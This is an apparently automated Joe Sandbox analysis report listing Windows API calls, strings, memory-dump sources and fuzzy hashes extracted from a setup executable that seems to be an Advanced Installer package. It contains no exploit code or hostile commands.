                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00BDF18F
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00BDF1B7
                                                                                                                                                                              • __Getcoll.LIBCPMT ref: 00BDF281
                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00BDF2C6
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00BDF2FE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcollRegister
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1184649410-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                              • String ID: */*$FTP Server$GET$HTTP/1.0$Local Network Server
                                                                                                                                                                              • API String ID: 1452528299-1822174798
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00D819CA,00D81996,?,?,00BDC5ED,00CCA740,?,00000008), ref: 00D819E1
                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D819EF
                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D81A08
                                                                                                                                                                              • SetLastError.KERNEL32(00000000,00D819CA,00D81996,?,?,00BDC5ED,00CCA740,?,00000008), ref: 00D81A5A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateWindowExW.USER32(?,SysTabControl32,?,46010000,?,?,?,?,00000000,00000309,00000000), ref: 00BD7AFD
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00BD7B12
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00BD7B1A
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                                • Part of subcall function 00BD9710: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BD975F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$AllocateCreateHeapWindow
                                                                                                                                                                              • String ID: SysTabControl32$TabHost
                                                                                                                                                                              • API String ID: 2359350451-2872506973
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,.dll,?,00000000,?,?,?,?,?,?,?), ref: 00BAF96B
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 00BAF9B4
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,DllGetActivationFactory,00000002,00000000,?,.dll,?,00000000,?,?,?,?,?,?,?), ref: 00BAFA02
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                              • String ID: .dll$DllGetActivationFactory
                                                                                                                                                                              • API String ID: 145871493-1250754257
                                                                                                                                                                              • Opcode ID: 49ec75e46b0d7616353488949f3328f34e21dc9528cefee7414e49595c64f33c
                                                                                                                                                                              • Instruction ID: b902582a813f815405e5a649fd56e56b2c22eb6699b27c664b39acebf2be6c37
                                                                                                                                                                              • Opcode Fuzzy Hash: 49ec75e46b0d7616353488949f3328f34e21dc9528cefee7414e49595c64f33c
                                                                                                                                                                              • Instruction Fuzzy Hash: EE615D30D0820AEEDF14DFA8C895BFDB7F1EF15300F2481A9E415A7291EB749A45CB61
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(02141699,02141699,?), ref: 00BC468F
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,02141699,?), ref: 00BC469C
                                                                                                                                                                              • KillTimer.USER32(?,00000001), ref: 00BC46E4
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000,?), ref: 00BC4773
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInitializeKillLeaveTimer
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 3614119372-3261393531
                                                                                                                                                                              • Opcode ID: fc72d4d099ab6550ab9edfb9b2b43ac05147d0e845b19f2e533c473a430a5b3e
                                                                                                                                                                              • Instruction ID: 7cb78d617386937db14018eedaca8f0dc8b94d6c4a17145f4cb027056ad463b6
                                                                                                                                                                              • Opcode Fuzzy Hash: fc72d4d099ab6550ab9edfb9b2b43ac05147d0e845b19f2e533c473a430a5b3e
                                                                                                                                                                              • Instruction Fuzzy Hash: DC41C2342007418FDB11DF28D954BAABBF5EF56310F2046AEE596E7391CB31AE15CB90
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,.dll,?,00000000,?,?,?,?,?,?,?), ref: 00BAF96B
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 00BAF9B4
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,DllGetActivationFactory,00000002,00000000,?,.dll,?,00000000,?,?,?,?,?,?,?), ref: 00BAFA02
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                              • String ID: .dll$DllGetActivationFactory
                                                                                                                                                                              • API String ID: 145871493-1250754257
                                                                                                                                                                              • Opcode ID: 10ad0eb947153b09064dffe9335a08d3674c6e393394a8829c2b6621656c8fb9
                                                                                                                                                                              • Instruction ID: 05a4d00eca3899bc36a1d687f518ce20c759c06169d00350e32f45e74f318b05
                                                                                                                                                                              • Opcode Fuzzy Hash: 10ad0eb947153b09064dffe9335a08d3674c6e393394a8829c2b6621656c8fb9
                                                                                                                                                                              • Instruction Fuzzy Hash: CD414F30D0420AEEDF24DFA8C894AFEB7F1EF55300F2581A9D015A71A1EB74DA45CB61
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(Advapi32.dll,02141699,02141699,?,?,?,?,Function_002082C0,000000FF), ref: 00CB6AF3
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 00CB6B1C
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,?,Function_002082C0,000000FF), ref: 00CB6B7C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressCloseHandleModuleProc
                                                                                                                                                                              • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                                                                                                                                              • API String ID: 4190037839-2994018265
                                                                                                                                                                              • Opcode ID: ad5e5e4a1d5982207da7c0792305d734f40d75811c291323793eb08f82a81682
                                                                                                                                                                              • Instruction ID: f090594386b7de1b0776b7878d8da3e0af42ce0e3a55a7d113e1a158c9c89312
                                                                                                                                                                              • Opcode Fuzzy Hash: ad5e5e4a1d5982207da7c0792305d734f40d75811c291323793eb08f82a81682
                                                                                                                                                                              • Instruction Fuzzy Hash: B0318E72744205AFEB248F45DC45FEABBB8FB08750F10412AF915E7280E779A904DAA4
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,02141699,00000000,?,00000000,00E0A459,000000FF,?,00D8B4FC,?,?,00D8B4D0,-00000010), ref: 00D8B5A1
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D8B5B3
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00E0A459,000000FF,?,00D8B4FC,?,?,00D8B4D0,-00000010), ref: 00D8B5D5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                              • Opcode ID: 4fb39bfe22fc54c097f482e74a368542dca1cb2403541a964f4b346b531a9ac5
                                                                                                                                                                              • Instruction ID: 7f7e3aab9160a244316860c9f306b200e0b58a17f6c9b465a7b957037d637837
                                                                                                                                                                              • Opcode Fuzzy Hash: 4fb39bfe22fc54c097f482e74a368542dca1cb2403541a964f4b346b531a9ac5
                                                                                                                                                                              • Instruction Fuzzy Hash: 6701D631940759EFDB019F91DC09BAEBBB8FB04B20F144626F811F26E0DB759948CB90
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D802A8
                                                                                                                                                                              • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr), ref: 00CD49DE
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00CD49E5
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CD49FC
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$AddressConditionInit_thread_footerLibraryLoadProcVariableWake
                                                                                                                                                                              • String ID: Dbghelp.dll$SymFromAddr
                                                                                                                                                                              • API String ID: 3268644551-642441706
                                                                                                                                                                              • Opcode ID: 7d33c1c760ee5d0f94112db22891aef79b31df4d3f3130cbe42d6996ffe4e8bb
                                                                                                                                                                              • Instruction ID: b1403682a2b8974ef214a02c5a495311700aefa8418548477145b7c8d8561d5a
                                                                                                                                                                              • Opcode Fuzzy Hash: 7d33c1c760ee5d0f94112db22891aef79b31df4d3f3130cbe42d6996ffe4e8bb
                                                                                                                                                                              • Instruction Fuzzy Hash: 0F01BCB1A49744EFD710DF99ED45B09B7F4EB0AB20F2003A6E965A73D0C73179088B22
                                                                                                                                                                              APIs
                                                                                                                                                                              • SleepConditionVariableCS.KERNELBASE(?,00D80285,00000064), ref: 00D8030B
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,00D80285,00000064,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF), ref: 00D80315
                                                                                                                                                                              • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00D80285,00000064,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF), ref: 00D80326
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00E9FF6C,?,00D80285,00000064,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409), ref: 00D8032D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDC.USER32(00000001), ref: 00BC4172
                                                                                                                                                                              • GetParent.USER32(00000001), ref: 00BC419D
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000138,?,00000001), ref: 00BC41AD
                                                                                                                                                                              • FillRect.USER32(?,?,00000000), ref: 00BC41BB
                                                                                                                                                                              • ReleaseDC.USER32(00000001,00000000), ref: 00BC4391
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FillMessageParentRectReleaseSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer$HeapProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowDC.USER32(?,02141699,?,?,00000000,?,?,?,?,?,?,?,?,00000000,00DE68DD,000000FF), ref: 00CAB2F0
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00CAB310
                                                                                                                                                                              • IsWindowEnabled.USER32(?), ref: 00CAB341
                                                                                                                                                                              • GetFocus.USER32 ref: 00CAB34F
                                                                                                                                                                              • DeleteDC.GDI32(?), ref: 00CAB465
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$DeleteEnabledFocusRect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDC.USER32(?), ref: 00BBCDCC
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BBCDDB
                                                                                                                                                                              • ReleaseDC.USER32(00000000), ref: 00BBCE22
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CapsDeviceRelease
                                                                                                                                                                              • String ID:
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ItemMessageSendWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00CC5074
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00CC5096
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC50BE
                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00CC51A7
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC51D1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 459529453-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetFocus.USER32(00000000,?,?), ref: 00BD04C8
                                                                                                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BD0510
                                                                                                                                                                              • SendMessageW.USER32(?,0000102C,000000FF,0000F000), ref: 00BD052C
                                                                                                                                                                              • SendMessageW.USER32(?,0000102B,000000FF,?), ref: 00BD055E
                                                                                                                                                                              • SetFocus.USER32(00000000,?,?), ref: 00BD0571
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Focus
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3982298024-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BB0B6A
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00BB0B70
                                                                                                                                                                              • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,00000000,00000000,00000000), ref: 00BB0B93
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00DA9C66,000000FF), ref: 00BB0BBB
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,00DA9C66,000000FF), ref: 00BB0BC1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$FreeProcess$FormatMessage
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1606019998-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BC8BBB
                                                                                                                                                                              • SendMessageW.USER32(?,?,?,0000102B), ref: 00BC8C18
                                                                                                                                                                              • SendMessageW.USER32(?,?,?,0000102B), ref: 00BC8C67
                                                                                                                                                                              • SendMessageW.USER32(?,00001043,00000000,00000000), ref: 00BC8C78
                                                                                                                                                                              • SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00BC8C85
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$LongWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 312131281-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateWindowExW.USER32(?,RichEdit20W,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00BD4E3C
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00BD4E51
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00BD4E59
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$AllocateCreateHeapWindow
                                                                                                                                                                              • String ID: RichEdit20W
                                                                                                                                                                              • API String ID: 2359350451-4173859555
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00D14240: SHGetSpecialFolderLocation.SHELL32(00000000,00000023,?,?,?,?,00EA16AC), ref: 00D14250
                                                                                                                                                                                • Part of subcall function 00D14240: LoadLibraryW.KERNEL32(Shell32.dll,?,?,00EA16AC), ref: 00D14263
                                                                                                                                                                                • Part of subcall function 00D14240: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00D14273
                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?,ADVINST_LOGS,0000000C,00EA16AC), ref: 00D00E58
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressAllocateExistsFileFolderHeapLibraryLoadLocationPathProcSpecial
                                                                                                                                                                              • String ID: ADVINST_LOGS$Everyone
                                                                                                                                                                              • API String ID: 3321256476-3921853867
